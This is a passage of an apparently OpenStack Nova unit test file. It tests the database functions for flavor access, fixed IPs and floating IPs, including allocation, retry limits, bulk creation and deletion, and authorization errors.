def _create_flavor_access(self, flavor_id, project_id):
return db.flavor_access_add(self.ctxt, flavor_id, project_id)
def test_flavor_access_get_by_flavor_id(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
for it, access_it in zip((it1, it2), (access_it1, access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_get_by_flavor_id_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_access_add(self):
flavor = self._create_flavor({'flavorid': 'f1'})
project_id = 'p1'
access = self._create_flavor_access(flavor['flavorid'], project_id)
# NOTE(boris-42): Check that flavor_access_add doesn't fail and
# returns correct value. This is enough because other
# logic is checked by other methods.
self.assertIsNotNone(access['id'])
self.assertEqual(access['instance_type_id'], flavor['id'])
self.assertEqual(access['project_id'], project_id)
def test_flavor_access_add_to_non_existing_flavor(self):
self.assertRaises(exception.FlavorNotFound,
self._create_flavor_access,
'nonexists', 'does_not_matter')
def test_flavor_access_add_duplicate_project_id_flavor(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessExists,
self._create_flavor_access, *params)
def test_flavor_access_remove(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
db.flavor_access_remove(self.ctxt, it1['flavorid'],
access_it1[1]['project_id'])
for it, access_it in zip((it1, it2), (access_it1[:1], access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_remove_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_access_remove,
self.ctxt, 'nonexists', 'does_not_matter')
def test_flavor_access_remove_access_not_found(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessNotFound,
db.flavor_access_remove,
self.ctxt, flavor['flavorid'], 'p2')
def test_flavor_access_removed_after_flavor_destroy(self):
flavor1 = self._create_flavor({'flavorid': 'f1', 'name': 'n1'})
flavor2 = self._create_flavor({'flavorid': 'f2', 'name': 'n2'})
values = [
(flavor1['flavorid'], 'p1'),
(flavor1['flavorid'], 'p2'),
(flavor2['flavorid'], 'p3')
]
for v in values:
self._create_flavor_access(*v)
db.flavor_destroy(self.ctxt, flavor1['name'])
p = (self.ctxt, flavor1['flavorid'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
p = (self.ctxt, flavor2['flavorid'])
self.assertEqual(1, len(db.flavor_access_get_by_flavor_id(*p)))
db.flavor_destroy(self.ctxt, flavor2['name'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
class FixedIPTestCase(BaseInstanceTypeTestCase):
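    """Tests for db.api.fixed_ip_* methods."""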
def _timeout_test(self, ctxt, timeout, multi_host):
instance = db.instance_create(ctxt, dict(host='foo'))
net = db.network_create_safe(ctxt, dict(multi_host=multi_host,
host='bar'))
old = timeout - datetime.timedelta(seconds=5)
new = timeout + datetime.timedelta(seconds=5)
# should deallocate
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# still allocated
db.fixed_ip_create(ctxt, dict(allocated=True,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# wrong network
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=old))
# too new
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=new))
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def test_fixed_ip_disassociate_all_by_timeout_single_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, False)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 0)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 1)
def test_fixed_ip_disassociate_all_by_timeout_multi_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, True)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 1)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 0)
def test_fixed_ip_get_by_floating_address(self):
fixed_ip = db.fixed_ip_create(self.ctxt, {'address': '192.168.0.2'})
values = {'address': '8.7.6.5',
'fixed_ip_id': fixed_ip['id']}
floating = db.floating_ip_create(self.ctxt, values)['address']
fixed_ip_ref = db.fixed_ip_get_by_floating_address(self.ctxt, floating)
self._assertEqualObjects(fixed_ip, fixed_ip_ref)
def test_fixed_ip_get_by_host(self):
host_ips = {
'host1': ['1.1.1.1', '1.1.1.2', '1.1.1.3'],
'host2': ['1.1.1.4', '1.1.1.5'],
'host3': ['1.1.1.6']
}
for host, ips in host_ips.iteritems():
for ip in ips:
instance_uuid = self._create_instance(host=host)
db.fixed_ip_create(self.ctxt, {'address': ip})
db.fixed_ip_associate(self.ctxt, ip, instance_uuid)
for host, ips in host_ips.iteritems():
ips_on_host = map(lambda x: x['address'],
db.fixed_ip_get_by_host(self.ctxt, host))
self._assertEqualListsOfPrimitivesAsSets(ips_on_host, ips)
def test_fixed_ip_get_by_network_host_not_found_exception(self):
self.assertRaises(
exception.FixedIpNotFoundForNetworkHost,
db.fixed_ip_get_by_network_host,
self.ctxt, 1, 'ignore')
def test_fixed_ip_get_by_network_host_fixed_ip_found(self):
db.fixed_ip_create(self.ctxt, dict(network_id=1, host='host'))
fip = db.fixed_ip_get_by_network_host(self.ctxt, 1, 'host')
self.assertEqual(1, fip['network_id'])
self.assertEqual('host', fip['host'])
def _create_instance(self, **kwargs):
instance = db.instance_create(self.ctxt, kwargs)
return instance['uuid']
def test_fixed_ip_get_by_instance_fixed_ip_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ip_get_by_instance_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_inappropriate_ignored(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
another_instance = db.instance_create(self.ctxt, {})
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=another_instance['uuid'], address="192.168.1.7"))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_not_found_exception(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForInstance,
db.fixed_ip_get_by_instance,
self.ctxt, instance_uuid)
def test_fixed_ips_by_virtual_interface_fixed_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ips_by_virtual_interface_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_inappropriate_ignored(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
another_vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=another_vif.id, address="192.168.1.7"))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_no_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self.assertEqual(0, len(ips_list))
def create_fixed_ip(self, **params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_fixed_ip_associate_fails_if_ip_not_in_network(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_fails_if_ip_in_use(self):
instance_uuid = self._create_instance()
address = self.create_fixed_ip(instance_uuid=instance_uuid)
self.assertRaises(exception.FixedIpAlreadyInUse,
db.fixed_ip_associate,
self.ctxt, address, instance_uuid)
def test_fixed_ip_associate_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_succeeds_and_sets_network(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_pool_invalid_uuid(self):
instance_uuid = '123'
self.assertRaises(exception.InvalidUUID, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_no_more_fixed_ips(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.NoMoreFixedIps, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_pool_succeeds_fip_ref_network_id_is_none(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=None)
fixed_ip = db.fixed_ip_associate_pool(self.ctxt,
network['id'], instance_uuid)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
self.assertEqual(network['id'], fixed_ip['network_id'])
def test_fixed_ip_associate_pool_succeeds_retry(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
def fake_first():
if mock_first.call_count == 1:
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
else:
return {'network_id': network['id'], 'address': address,
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
def test_fixed_ip_associate_pool_retry_limit_exceeded(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=network['id'])
def fake_first():
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FixedIpAssociateFailed,
db.fixed_ip_associate_pool, self.ctxt,
network['id'], instance_uuid)
self.assertEqual(5, mock_first.call_count)
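    # The two retry tests above assume a bounded re-read/claim loop inside
    # fixed_ip_associate_pool: the candidate row returned by Query.first()
    # is re-fetched and the association retried when the claim fails, up to
    # five attempts before FixedIpAssociateFailed is raised. A minimal
    # sketch of that assumed pattern (helper names are hypothetical):
    #
    #     for _ in range(5):
    #         candidate = _pick_unassociated_ip(network_id)
    #         if candidate is not None and _claim(candidate, instance_uuid):
    #             return candidate
    #     raise exception.FixedIpAssociateFailed(...)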
def test_fixed_ip_create_same_address(self):
address = '192.168.1.5'
params = {'address': address}
db.fixed_ip_create(self.ctxt, params)
self.assertRaises(exception.FixedIpExists, db.fixed_ip_create,
self.ctxt, params)
def test_fixed_ip_create_success(self):
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': '192.168.1.5',
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_data = db.fixed_ip_create(self.ctxt, param)
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_bulk_create_same_address(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_2, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None},
]
self.assertRaises(exception.FixedIpExists, db.fixed_ip_bulk_create,
self.ctxt, params)
# In this case the transaction will be rolled back and none of the ips
# will make it to the database.
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_1)
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_2)
def test_fixed_ip_bulk_create_success(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None}
]
db.fixed_ip_bulk_create(self.ctxt, params)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at',
'virtual_interface', 'network', 'floating_ips']
fixed_ip_data = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
        # We have no `id` in the incoming data, so we cannot use
        # _assertEqualListsOfObjects to compare the incoming data with the
        # received objects.
fixed_ip_data = sorted(fixed_ip_data, key=lambda i: i['network_id'])
params = sorted(params, key=lambda i: i['network_id'])
for param, ip in zip(params, fixed_ip_data):
self._assertEqualObjects(param, ip, ignored_keys)
def test_fixed_ip_disassociate(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
values = {'address': '192.168.1.5', 'instance_uuid': instance_uuid}
vif = db.virtual_interface_create(self.ctxt, values)
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': vif['id']
}
db.fixed_ip_create(self.ctxt, param)
db.fixed_ip_disassociate(self.ctxt, address)
fixed_ip_data = db.fixed_ip_get_by_address(self.ctxt, address)
ignored_keys = ['created_at', 'id', 'deleted_at',
'updated_at', 'instance_uuid',
'virtual_interface_id']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
self.assertIsNone(fixed_ip_data['instance_uuid'])
self.assertIsNone(fixed_ip_data['virtual_interface_id'])
def test_fixed_ip_get_not_found_exception(self):
self.assertRaises(exception.FixedIpNotFound,
db.fixed_ip_get, self.ctxt, 0)
def test_fixed_ip_get_success2(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
fixed_ip_id = db.fixed_ip_create(self.ctxt, param)
self.ctxt.is_admin = False
self.assertRaises(exception.Forbidden, db.fixed_ip_get,
self.ctxt, fixed_ip_id)
def test_fixed_ip_get_success(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
db.fixed_ip_create(self.ctxt, param)
fixed_ip_id = db.fixed_ip_get_by_address(self.ctxt, address)['id']
fixed_ip_data = db.fixed_ip_get(self.ctxt, fixed_ip_id)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_get_by_address(self):
instance_uuid = self._create_instance()
db.fixed_ip_create(self.ctxt, {'address': '1.2.3.4',
'instance_uuid': instance_uuid,
})
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, '1.2.3.4',
columns_to_join=['instance'])
self.assertIn('instance', fixed_ip.__dict__)
self.assertEqual(instance_uuid, fixed_ip.instance.uuid)
def test_fixed_ip_update_not_found_for_address(self):
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_update, self.ctxt,
'192.168.1.5', {})
def test_fixed_ip_update(self):
instance_uuid_1 = self._create_instance()
instance_uuid_2 = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
param_1 = {
'reserved': True, 'deleted': 0, 'leased': True,
'host': '192.168.133.1', 'address': '10.0.0.2',
'allocated': True, 'instance_uuid': instance_uuid_1,
'network_id': network_id_1, 'virtual_interface_id': '123',
}
param_2 = {
'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': '10.0.0.3', 'allocated': False,
'instance_uuid': instance_uuid_2, 'network_id': network_id_2,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_addr = db.fixed_ip_create(self.ctxt, param_1)['address']
db.fixed_ip_update(self.ctxt, fixed_ip_addr, param_2)
fixed_ip_after_update = db.fixed_ip_get_by_address(self.ctxt,
param_2['address'])
self._assertEqualObjects(param_2, fixed_ip_after_update, ignored_keys)
class FloatingIpTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(FloatingIpTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'address': '1.1.1.1',
'fixed_ip_id': None,
'project_id': 'fake_project',
'host': 'fake_host',
'auto_assigned': False,
'pool': 'fake_pool',
'interface': 'fake_interface',
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_floating_ip(self, values):
if not values:
values = {}
vals = self._get_base_values()
vals.update(values)
return db.floating_ip_create(self.ctxt, vals)
def test_floating_ip_get(self):
values = [{'address': '0.0.0.0'}, {'address': '1.1.1.1'}]
floating_ips = [self._create_floating_ip(val) for val in values]
for floating_ip in floating_ips:
real_floating_ip = db.floating_ip_get(self.ctxt, floating_ip['id'])
self._assertEqualObjects(floating_ip, real_floating_ip,
ignored_keys=['fixed_ip'])
def test_floating_ip_get_not_found(self):
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, 100500)
def test_floating_ip_get_with_long_id_not_found(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidID,
db.floating_ip_get, self.ctxt, 123456789101112)
def test_floating_ip_get_pools(self):
values = [
{'address': '0.0.0.0', 'pool': 'abc'},
{'address': '1.1.1.1', 'pool': 'abc'},
{'address': '2.2.2.2', 'pool': 'def'},
{'address': '3.3.3.3', 'pool': 'ghi'},
]
for val in values:
self._create_floating_ip(val)
expected_pools = [{'name': x}
for x in set(map(lambda x: x['pool'], values))]
real_pools = db.floating_ip_get_pools(self.ctxt)
self._assertEqualListsOfPrimitivesAsSets(real_pools, expected_pools)
def test_floating_ip_allocate_address(self):
pools = {
'pool1': ['0.0.0.0', '1.1.1.1'],
'pool2': ['2.2.2.2'],
'pool3': ['3.3.3.3', '4.4.4.4', '5.5.5.5']
}
for pool, addresses in pools.iteritems():
for address in addresses:
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
for pool, addresses in pools.iteritems():
alloc_addrs = []
for i in addresses:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
alloc_addrs.append(float_addr)
self._assertEqualListsOfPrimitivesAsSets(alloc_addrs, addresses)
def test_floating_ip_allocate_auto_assigned(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
float_ips = []
for i in range(0, 2):
float_ips.append(self._create_floating_ip(
{"address": addresses[i]}))
for i in range(2, 4):
float_ips.append(self._create_floating_ip({"address": addresses[i],
"auto_assigned": True}))
for i in range(0, 2):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertFalse(float_ip.auto_assigned)
for i in range(2, 4):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertTrue(float_ip.auto_assigned)
def test_floating_ip_allocate_address_no_more_floating_ips(self):
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
def test_floating_ip_allocate_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_allocate_address,
ctxt, 'other_project_id', 'any_pool')
def test_floating_ip_allocate_address_succeeds_retry(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
floating_ip = self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
if mock_first.call_count == 1:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
else:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
self.assertEqual(address, float_addr)
self.assertEqual(2, mock_first.call_count)
float_ip = db.floating_ip_get(self.ctxt, floating_ip.id)
self.assertEqual(project_id, float_ip['project_id'])
def test_floating_ip_allocate_address_retry_limit_exceeded(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FloatingIpAllocateFailed,
db.floating_ip_allocate_address, self.ctxt,
project_id, pool)
self.assertEqual(5, mock_first.call_count)
def test_floating_ip_allocate_address_no_more_ips_with_no_retries(self):
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
self.assertEqual(1, mock_first.call_count)
def _get_existing_ips(self):
return [ip['address'] for ip in db.floating_ip_get_all(self.ctxt)]
def test_floating_ip_bulk_create(self):
expected_ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
result = db.floating_ip_bulk_create(self.ctxt,
map(lambda x: {'address': x}, expected_ips),
want_result=False)
self.assertIsNone(result)
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_ips)
def test_floating_ip_bulk_create_duplicate(self):
ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
prepare_ips = lambda x: {'address': x}
result = db.floating_ip_bulk_create(self.ctxt, map(prepare_ips, ips))
self.assertEqual(ips, [ip.address for ip in result])
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_bulk_create,
self.ctxt, map(prepare_ips, ['1.1.1.5', '1.1.1.4']),
want_result=False)
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '1.1.1.5')
def test_floating_ip_bulk_destroy(self):
ips_for_delete = []
ips_for_non_delete = []
def create_ips(i, j):
return [{'address': '1.1.%s.%s' % (i, k)} for k in range(1, j + 1)]
        # NOTE(boris-42): Create more than 256 ips to check that
        # _ip_range_splitter works properly.
for i in range(1, 3):
ips_for_delete.extend(create_ips(i, 255))
ips_for_non_delete.extend(create_ips(3, 255))
result = db.floating_ip_bulk_create(self.ctxt,
ips_for_delete + ips_for_non_delete,
want_result=False)
self.assertIsNone(result)
non_bulk_ips_for_delete = create_ips(4, 3)
non_bulk_ips_for_non_delete = create_ips(5, 3)
non_bulk_ips = non_bulk_ips_for_delete + non_bulk_ips_for_non_delete
project_id = 'fake_project'
reservations = quota.QUOTAS.reserve(self.ctxt,
floating_ips=len(non_bulk_ips),
project_id=project_id)
for dct in non_bulk_ips:
self._create_floating_ip(dct)
quota.QUOTAS.commit(self.ctxt, reservations, project_id=project_id)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 6, 'reserved': 0}})
ips_for_delete.extend(non_bulk_ips_for_delete)
ips_for_non_delete.extend(non_bulk_ips_for_non_delete)
db.floating_ip_bulk_destroy(self.ctxt, ips_for_delete)
expected_addresses = map(lambda x: x['address'], ips_for_non_delete)
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_addresses)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 3, 'reserved': 0}})
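    # The bulk-destroy test above creates more than 256 addresses because
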